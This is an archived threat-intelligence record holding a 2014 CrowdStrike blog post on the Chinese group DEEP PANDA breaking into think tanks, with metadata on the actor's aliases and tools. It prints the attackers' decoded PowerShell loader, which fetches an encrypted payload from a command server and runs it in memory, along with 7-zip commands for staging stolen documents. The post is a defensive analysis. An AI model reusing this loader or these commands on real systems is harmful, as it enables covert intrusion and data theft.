{
	"id": "854e2872-8c9f-4e54-85d7-99ece1c8ca89",
	"created_at": "2026-04-06T00:21:20.68122Z",
	"updated_at": "2026-04-10T03:33:22.359992Z",
	"deleted_at": null,
	"sha1_hash": "134f05cf90219d65b49397ac50ad88971f6b5fae",
	"title": "Deep in Thought: Chinese Targeting of National Security Think Tanks »",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 827475,
	"plain_text": "Deep in Thought: Chinese Targeting of National Security Think\r\nTanks »\r\nBy Dmitri Alperovitch\r\nPublished: 2014-07-07 · Archived: 2026-04-05 16:34:45 UTC\r\nFor some time now, CrowdStrike has been working with a number of national security think tanks and human\r\nrights organizations on a pro bono basis to help them with their security posture. These organizations face some of\r\nthe most advanced nation-state adversaries — China, Russia, and Iran, just to name a few. The individuals who are\r\ntypically targeted at these institutions tend to be former senior government officials who still have lots of contacts\r\nwithin Western governments and, as such, their private correspondence is of extreme interest to these attackers.\r\nThe intelligence services of these nation states are always on the lookout for any clues they may extract from such\r\nprivate communications that may give them an advanced insight into what options government policy makers are\r\nconsidering on particular issues of interest. At the same time, with access to the victim email mailboxes, the\r\nadversaries can craft very realistic spear-phishing lures to the government contacts of targeted think tank\r\npersonnel by piggybacking on ongoing real conversations and increasing their chances of a successful\r\ncompromise of an official government email account.\r\nDespite this high threat level, these think tanks are organized as non-profits and often do not have the budgets of\r\ncommercial organizations to afford cutting-edge security technologies that can help them effectively detect these\r\nthreats. 
For this reason, CrowdStrike has provided our Falcon Host endpoint security technology to many of these\r\norganizations at no charge to them to help detect and attribute these attackers on their networks in real time, as\r\nwell as to receive instantaneous full forensic visibility into their behavior to help with full remediation of any\r\nincident.\r\nRecently, Falcon Host has detected multiple simultaneous compromises at several national security think tanks\r\nfrom an actor we call DEEP PANDA, one of the most advanced Chinese nation-state cyber intrusion groups. For\r\nalmost three years now, CrowdStrike has monitored DEEP PANDA targeting critical and strategic business\r\nverticals including: government, defense, financial, legal, and the telecommunications industries. At the think\r\ntanks, Falcon Host detected targeting of senior individuals involved in geopolitical policy issues, in particular in\r\nthe China/Asia Pacific region. However, last week the unprecedented real-time visibility provided by Falcon Host\r\ninto this actor’s escapades allowed analysts to observe a radical change in targeting.\r\nThis actor, who was engaged in targeting and collection of Southeast Asia policy information, suddenly began\r\ntargeting individuals with a tie to Iraq/Middle East issues. This is undoubtedly related to the recent Islamic State\r\nof Iraq and the Levant (ISIS) takeover of major parts of Iraq and the potential disruption for major Chinese oil\r\ninterests in that country. In fact, Iraq happens to be the fifth-largest source of crude oil imports for China and the\r\ncountry is the largest foreign investor in Iraq’s oil sector. Thus, it wouldn’t be surprising if the Chinese\r\ngovernment is highly interested in getting a better sense of the possibility of deeper U.S. 
military involvement that\r\nhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/\r\nPage 1 of 7\n\ncould help protect the Chinese oil infrastructure in Iraq. In fact, the shift in targeting of Iraq policy individuals\r\noccurred on June 18, the day that ISIS began its attack on the Baiji oil refinery.\r\nThe Attacks\r\nCrowdStrike’s Falcon Host technology used by these think tanks consists of a tiny (under 5mb in size) kernel\r\nsensor that is deployed on Windows and Mac servers, desktops, and laptops and is able to do real-time detection\r\nand recording of all adversary activities taking place on the system. In addition, by matching the detected\r\nactivities against our vast Adversary Intelligence repository, Falcon Host can automatically attribute the attack to a\r\nknown adversary group and provide details about their motivations, capabilities, and key Tactics, Techniques, and\r\nProcedures (TTPs).\r\nRecently, we detected breaches of these networks via the use of powershell scripts deployed by the adversary as\r\nscheduled tasks on Windows machines. 
The scripts are passed to the powershell interpreter through the command\r\nline to avoid placement of extraneous files on the victim machine that could potentially trigger AV- or Indicator of\r\nCompromise (IOC)-based detection.\r\nThe scripts were scheduled to call back every two hours to the DEEP PANDA Command and Control (C2)\r\ninfrastructure.\r\nThe script in the command line is base64 encoded, but when decoded it translates to the following code snippet:\r\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\r\n$wc = New-Object -TypeName System.Net.WebClient\r\n$wc.Headers.Add(\"Accept-Language\", \"en-US,en;q=0.\" + ([IntPtr]::Size - 1).ToString())\r\n$wc.Headers.Add(\"User-Agent\", \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\")\r\n$rndn = Get-Random\r\n$wc.Headers.Add(\"Cookie\", \"p=\" + $rndn)\r\n$data = $wc.DownloadData(\"https://\u003cANONYMIZED\u003e/config/oauth/\")\r\n[string[]]$xags = \"https://\u003cANONYMIZED\u003e/config/login/\", \"WMITool.Program\", \"Main\", \"/f\", \"ssh\", \"/s\",\r\n\"\u003cANONYMIZED\u003e\", \"/p\", \"443\"\r\n$Passphrase = \"\u003cANONYMIZED\u003e\"\r\n$salts = \"\u003cANONYMIZED\u003e\"\r\n$r = new-Object System.Security.Cryptography.RijndaelManaged\r\n$pass = [System.Text.Encoding]::UTF8.GetBytes($Passphrase)\r\n$salt = [System.Text.Encoding]::UTF8.GetBytes($salts)\r\n$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, \"SHA1\", 5).GetBytes(32) #256/8\r\n$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash(\r\n[Text.Encoding]::UTF8.GetBytes($rndn) )[0..15]\r\n$d = $r.CreateDecryptor()\r\n$ms = new-Object IO.MemoryStream @(,$data)\r\n$cs = new-Object Security.Cryptography.CryptoStream $ms,$d,\"Read\"\r\n$dfs = New-Object System.IO.Compression.GzipStream $cs,\r\n([IO.Compression.CompressionMode]::Decompress)\r\n$msout = New-Object System.IO.MemoryStream\r\n[byte[]]$buffer = new-object byte[] 4096\r\n[int]$count = 0\r\ndo\r\n{\r\n $count = $dfs.Read($buffer, 0, $buffer.Length)\r\n $msout.Write($buffer, 0, $count)\r\n} while ($count -gt 0)\r\n$dfs.Close()\r\n$cs.Close()\r\n$ms.Close()\r\n$r.Clear()\r\n[byte[]]$bin = $msout.ToArray()\r\n$al = New-Object -TypeName System.Collections.ArrayList\r\n$al.Add($xags)\r\n$asm = [System.Reflection.Assembly]::Load($bin)\r\n$asm.EntryPoint.Invoke($null, $al.ToArray())\r\nsleep 5\r\nExit\r\nOnce executed, it downloads and executes from memory a .NET executable (typically named Wafer), which in\r\nturn typically downloads and runs MadHatter .NET Remote Access Tool (RAT), one of the favorites of DEEP\r\nPANDA. By running them from memory, it leaves no disk artifacts or host-based IOCs that can be identified in\r\nforensic analysis. This is typical for DEEP PANDA — stealth is their specialty and they prefer to operate in a way\r\nthat leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time.\r\n[Figure: deeppanda_thinktankblog.png]\r\nFor this same reason, DEEP PANDA likes to use webshells to keep low-footprint persistent access to the victim\r\nnetwork, as we’ve covered in our prior blogs. This case was no exception, and that initial webshell implant\r\nallowed them to execute reconnaissance commands such as “tasklist,” “net view,” and “net localgroup\r\nadministrators,” and then afterward to deploy the powershell scripts.\r\nThe adversary used stolen credentials to mount network shares via the “net use” command. In one case, they brought\r\nin Cult of the Dead Cow’s NetE tool onto the system, but most of the time they leveraged existing Windows tools\r\nand avoided bringing many new tools into the environment that could make them noisy and easily detectable by\r\ntechnologies that scan for static IOCs.\r\nAfter using compromised credentials to mount file shares, the adversary was seen compressing data using 7-zip.\r\nThey were adding different document types to compressed files by wildcarding the extensions, such as:\r\n\"C:\\Program Files\\7-Zip\\7z\" a setup1.log -r -pkkk*** \"\\\\\u003cshare name\u003e\\users\\\u003cUserName\u003e\\*rtf *doc\"\r\n\"C:\\Program Files\\7-Zip\\7z\" a setup1.log -r -pkkk*** \"\\\\\u003cshare name\u003e\\users\\\u003cUserName\u003e\\*ppt\"\r\nThey knew exactly which users to target based on their research policy area, and they rapidly pivoted from\r\nChina/Asia Pacific policy experts to Iraq/Middle East policy experts once their tasking collection requirements\r\nchanged.\r\nAggressive Use of Ping to Determine Which Machines of Interest are Online\r\nOn one of the compromised machines, the adversary brought in a command-line version of the RAR archiver that was\r\nnamed “cftmon.exe” and placed it into the “c:\\windows\\temp\\hotfix” directory. The files were encrypted (both file data\r\nand headers) with the “uinfw” password, and the archive files were named after the initials of each user that had been\r\ntargeted and stored in the same “c:\\windows\\temp\\hotfix” directory.\r\nFor lateral movement, they used WMI to deploy the powershell scripts remotely and set up scheduled tasks on the\r\nremote systems.\r\nDespite the fact that we were seeing nearly identical TTPs used across multiple think-tank targets, there is\r\nevidence to indicate that these operations had different individuals behind the keyboard, based on the intricacies of\r\nhow certain powershell command lines had been used in each case.\r\nSummary\r\nDEEP PANDA presents a very serious threat not just to think tanks, but also to multinational financial institutions,\r\nlaw firms, defense contractors, and government agencies. Due to their stellar operational security and reliance on\r\nanti-forensic and anti-IOC detection techniques, detecting and stopping them is very challenging without the use\r\nof next-generation endpoint technology like Falcon Host. Not only was Falcon Host able to detect this adversary\r\nwithout relying on static signatures or IOCs, but it was able to provide instantaneous and full forensic analysis of\r\nwhat had occurred on each of the compromised endpoints without the need to pull hard drives and do costly and\r\ntime-intensive forensics, substantially reducing the time needed for remediation.\r\nIf you are a non-profit think tank or a human rights organization that would like to take advantage of our no-charge offer of Falcon Host licenses for your servers and desktops, please email us at sales@crowdstrike.com with\r\nthe subject “Non-Profit Falcon Host Offer.”\r\nOur Falcon Intelligence subscribers have had access to multiple reports on the DEEP PANDA actor that include\r\nfull analysis of their attribution, tradecraft and TTPs, as well as detection indicators and signatures and\r\nremediation instructions. And our CrowdStrike Services team has worked on multiple intrusion investigations related to\r\nDEEP PANDA in the last year. If you would also like to see a demo of Falcon Host or Falcon Intelligence in\r\naction or discuss our Services offerings, please contact our Sales Team to schedule a personal briefing.\r\nStay safe and keep a watchful eye on the Pandas, Bears, Kittens, and other threat actors who are relentlessly\r\npreying on your data!\r\nSource: https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/"
	],
	"report_names": [
		"deep-thought-chinese-targeting-national-security-think-tanks"
	],
	"threat_actors": [
		{
			"id": "64ca1755-3883-4173-8e0a-6e5cf92faafd",
			"created_at": "2022-10-25T15:50:23.636456Z",
			"updated_at": "2026-04-10T02:00:05.389234Z",
			"deleted_at": null,
			"main_name": "Deep Panda",
			"aliases": [
				"Deep Panda",
				"Shell Crew",
				"KungFu Kittens",
				"PinkPanther",
				"Black Vine"
			],
			"source_name": "MITRE:Deep Panda",
			"tools": [
				"Mivast",
				"StreamEx",
				"Sakula",
				"Tasklist",
				"Derusbi"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f",
			"created_at": "2022-10-25T16:07:23.335869Z",
			"updated_at": "2026-04-10T02:00:04.547702Z",
			"deleted_at": null,
			"main_name": "APT 19",
			"aliases": [
				"APT 19",
				"Bronze Firestone",
				"C0d0so0",
				"Checkered Typhoon",
				"Codoso",
				"Deep Panda",
				"G0009",
				"G0073",
				"Operation Kingslayer",
				"Red Pegasus",
				"Sunshop Group",
				"TG-3551"
			],
			"source_name": "ETDA:APT 19",
			"tools": [
				"Agentemis",
				"C0d0so0",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"EmPyre",
				"EmpireProject",
				"Fire Chili",
				"PowerShell Empire",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f2ce5b52-a220-4b94-ab66-4b81f3fed05d",
			"created_at": "2025-08-07T02:03:24.595597Z",
			"updated_at": "2026-04-10T02:00:03.740023Z",
			"deleted_at": null,
			"main_name": "BRONZE FIRESTONE",
			"aliases": [
				"APT19 ",
				"C0d0s0",
				"Checkered Typhoon ",
				"Chlorine ",
				"Deep Panda ",
				"Pupa ",
				"TG-3551 "
			],
			"source_name": "Secureworks:BRONZE FIRESTONE",
			"tools": [
				"9002",
				"Alice's Rabbit Hole",
				"Cobalt Strike",
				"Derusbi",
				"PlugX",
				"PoisonIvy",
				"PowerShell Empire",
				"Trojan Briba",
				"Zuguo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434880,
	"ts_updated_at": 1775792002,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/134f05cf90219d65b49397ac50ad88971f6b5fae.pdf",
		"text": "https://archive.orkl.eu/134f05cf90219d65b49397ac50ad88971f6b5fae.txt",
		"img": "https://archive.orkl.eu/134f05cf90219d65b49397ac50ad88971f6b5fae.jpg"
	}
}